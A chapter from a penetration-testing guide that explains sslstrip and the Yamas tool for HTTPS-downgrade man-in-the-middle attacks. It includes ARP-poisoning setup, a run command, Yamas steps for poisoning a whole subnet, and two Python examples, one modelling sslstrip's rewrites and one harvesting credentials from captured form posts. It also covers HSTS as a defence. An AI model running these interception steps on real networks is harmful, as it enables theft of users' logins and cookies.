Ethical Hacking and Penetration Testing Guide
SSL Strip: Stripping HTTPS Traffic
So far we have only discussed capturing plain HTTP traffic, not HTTPS connections. For those, a tool called sslstrip comes in handy. It is aimed at sites that start out over HTTP and then link or redirect to HTTPS for sensitive pages such as login forms. Sitting in the middle, sslstrip fetches the real page from the server over HTTPS, rewrites every https:// link (and every redirect to https://) in the response to http:// before handing it to the victim, and remembers each rewrite so that when the victim follows the downgraded link the proxy can fetch the HTTPS version upstream. The victim's side of the connection stays in plaintext, so everything the victim submits can be read.
It also strips the Secure flag from any cookie the server sets (the Set-Cookie header in the response). The Secure flag instructs the browser to send that cookie only over HTTPS; with the flag removed, the browser sends it over the downgraded HTTP connection as well, so we capture cookies too. To make the page look legitimate, sslstrip can also replace the site's favicon with a padlock icon so that the victim thinks the connection is secure.
The attack depends on the victim's first request to the site being plaintext HTTP, typically a typed or bookmarked address without the scheme. A browser that has HTTP Strict Transport Security (HSTS) cached for the site, or carries it in its preload list, rewrites the address to https:// before the request leaves the machine, so sslstrip never sees a connection to downgrade. This is why the technique works far less often against current browsers and major sites than it did when the tool was written.
Requirements
In order to run sslstrip we must already be in the middle of the victim's traffic, which is the ARP spoofing attack discussed earlier; any of the tools covered there will do. Before starting the ARP spoofing, make sure IP forwarding is enabled on the attacking machine (otherwise the victim's traffic is dropped instead of relayed and the victim simply loses connectivity), and that incoming TCP traffic to port 80 is redirected, with an iptables NAT PREROUTING rule, to the port on which sslstrip will listen. Without that redirect the victim's HTTP requests pass straight through and sslstrip never sees them.
Usage
In BackTrack, sslstrip can be found in the /pentest/web/sslstrip directory. Navigate to that directory and execute the following command to get it running:
root@bt:/pentest/web/sslstrip# ./sslstrip.py -l 8080
The -l parameter instructs sslstrip to listen on port 8080; this must match the port to which the iptables rule redirects port-80 traffic.
Whenever the victim logs in to an account, say Facebook, the connection is forced over plain HTTP, so any packet-capturing tool can read the credentials off the wire.
Alternatively, sslstrip writes what it sees to the file sslstrip.log in the directory it was started from; open that log with any text editor.
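The rewrites described above, modelled in a few functions so the mechanism can be followed without a live network. This is an added example, not sslstrip's own code: the response it processes is constructed, example.com is a placeholder host, and the handling is reduced to the three cases the text names (https links in the body, https redirects, and the Secure cookie flag). The last function shows the HSTS caveat: if the browser never emits the plaintext request, there is nothing to downgrade.

```python
"""Model of the rewrites sslstrip applies to a plaintext HTTP exchange.

Added example, not sslstrip's own code. The sample response is constructed,
example.com is a placeholder, and header handling is simplified.
"""
import re
from urllib.parse import urlsplit

# Downgraded URL the victim will request -> original https URL the proxy
# must fetch upstream (the "remembered" change).
stripped_urls: dict = {}

_HTTPS_URL = re.compile(r"https://[^\s\"'<>]+", re.IGNORECASE)


def rewrite_url(url: str) -> str:
    """Turn one https URL into http and remember where it came from."""
    if not url.lower().startswith("https://"):
        return url
    downgraded = "http://" + url[len("https://"):]
    stripped_urls[downgraded] = url
    return downgraded


def strip_body(body: str) -> str:
    """Rewrite every https link found in an HTML or script body."""
    return _HTTPS_URL.sub(lambda m: rewrite_url(m.group(0)), body)


def strip_secure_flag(set_cookie: str) -> str:
    """Drop the Secure attribute so the browser will send the cookie over http."""
    attrs = [a.strip() for a in set_cookie.split(";")]
    return "; ".join(a for a in attrs if a.lower() != "secure")


def strip_response(headers: list, body: str):
    """Apply the downgrade to a server response on its way to the victim.

    headers is a list of (name, value) pairs; returns (headers, body).
    """
    out = []
    for name, value in headers:
        key = name.lower()
        if key == "location":          # redirect-to-https becomes redirect-to-http
            value = rewrite_url(value)
        elif key == "set-cookie":
            value = strip_secure_flag(value)
        out.append((name, value))
    return out, strip_body(body)


def upstream_url(victim_url: str) -> str:
    """The proxy fetches over https anything it previously downgraded."""
    return stripped_urls.get(victim_url, victim_url)


def protected_by_hsts(url: str, hsts_cache: dict) -> bool:
    """Does the browser upgrade this request before it leaves the machine?

    hsts_cache maps host -> includeSubDomains flag (cached or preloaded).
    An entry for the host itself, or for a parent domain with
    includeSubDomains, means the plaintext request sslstrip needs never exists.
    """
    host = (urlsplit(url).hostname or "").lower()
    labels = host.split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in hsts_cache and (i == 0 or hsts_cache[candidate]):
            return True
    return False


# Constructed sample: what the real server returned over the attacker's
# upstream https connection, before sslstrip rewrites it for the victim.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly"),
]
SAMPLE_BODY = (
    '<form action="https://example.com/login" method="post">'
    '<a href="https://example.com/help">help</a></form>'
)
SAMPLE_REDIRECT = [("Location", "https://example.com/account")]


def demo() -> dict:
    """Run the sample through the proxy logic and collect the results."""
    headers, body = strip_response(SAMPLE_HEADERS, SAMPLE_BODY)
    redirect, _ = strip_response(SAMPLE_REDIRECT, "")
    return {
        "cookie": dict(headers)["Set-Cookie"],
        "body": body,
        "location": dict(redirect)["Location"],
        "upstream_for_login": upstream_url("http://example.com/login"),
        "hsts_blocks_victim": protected_by_hsts(
            "http://www.example.com/", {"example.com": True}),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The remembered mapping is what lets the proxy keep the server side honest: the server only ever sees HTTPS from the attacker, while the victim only ever sees HTTP, and neither end notices the other half of the conversation is on a different scheme.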
Automating Man in the Middle Attacks
We have already covered several tools that can be used to perform man in the middle attacks. The last tool we will look at is Yamas, which was created to automate them and is simple to use. Yamas drives arpspoof, ettercap, and sslstrip to do its work, so the HTTPS stripping described above is included.
It is not part of BackTrack by default; it can be downloaded from the following link:
http://comax.fr/yamas.php
Usage
Once you have downloaded and installed Yamas, type the yamas command in a terminal to launch it.
Step 1: After launching it, you are asked for the port sslstrip will listen on and the port whose traffic is redirected to it. Go with the defaults, 8080 and 80.
Step 2: Next it asks for the output file; go with the default. It then asks for your default gateway and the interface to use. In my case the default gateway is 192.168.15.1 and the interface is eth0.
Step 3: Next it asks for the target host; by default it scans the whole network for live hosts.
Step 4: That is it. Yamas ARP-poisons the whole network and opens a passwords window where the credentials it captures are displayed.
Once these steps are performed, any plaintext credential sent across the network, including credentials that would have travelled over HTTPS had sslstrip not downgraded the connection, will be captured. Poisoning the entire subnet rather than one target also disrupts everyone on it and is noisy; on a client engagement, name the in-scope host in step 3 instead of accepting the default.
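What the passwords window is doing underneath is the credential-extraction part: reading form posts out of the downgraded traffic. The following is an added example of that step, not Yamas' or sslstrip's code. The captured requests are constructed, they are plain HTTP/1.1 request dumps rather than the layout of sslstrip.log, and the field names treated as username and password are an assumption to be extended per target.

```python
"""Extract login credentials from captured plaintext HTTP POST requests.

Added example, not Yamas' or sslstrip's own code. The capture is constructed,
each entry being one raw HTTP/1.1 request, and the credential field names are
an assumption.
"""
from urllib.parse import parse_qs

# Ordered by priority; assumption, extend for the target's login form.
USER_FIELDS = ("username", "user", "email", "login", "uid")
PASS_FIELDS = ("password", "pass", "passwd", "pwd")


def parse_request(raw: str):
    """Split a raw request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def extract_credentials(raw: str):
    """Return {host, path, user, password} for a form login, else None."""
    method, target, headers, body = parse_request(raw)
    if method != "POST":
        return None
    # Only classic form posts are handled; JSON login APIs are skipped here.
    if not headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"):
        return None
    fields = {k.lower(): v[0] for k, v in parse_qs(body).items()}
    user = next((fields[k] for k in USER_FIELDS if k in fields), None)
    password = next((fields[k] for k in PASS_FIELDS if k in fields), None)
    if password is None:
        return None
    return {
        "host": headers.get("host", "?"),
        "path": target,
        "user": user,
        "password": password,
    }


def harvest(requests) -> list:
    """Run every captured request through the extractor, keeping the hits."""
    found = []
    for raw in requests:
        creds = extract_credentials(raw)
        if creds is not None:
            found.append(creds)
    return found


# Constructed capture: a page load, a downgraded form login, and a JSON call.
SAMPLE_CAPTURE = [
    "GET /login HTTP/1.1\r\nHost: example.com\r\n\r\n",
    "POST /login HTTP/1.1\r\nHost: example.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "email=alice%40example.com&pass=hunter2",
    "POST /api/session HTTP/1.1\r\nHost: example.com\r\n"
    "Content-Type: application/json\r\n\r\n"
    '{"password": "not-handled-here"}',
]


if __name__ == "__main__":
    for hit in harvest(SAMPLE_CAPTURE):
        print(f"{hit['host']}{hit['path']}: {hit['user']} / {hit['password']}")
```

Note that the extractor only recognises credentials because the request reached it in plaintext; that is the whole point of the downgrade, and it is also why the absence of such posts for a site, when the victim did log in, is a sign that HSTS kept the browser on HTTPS.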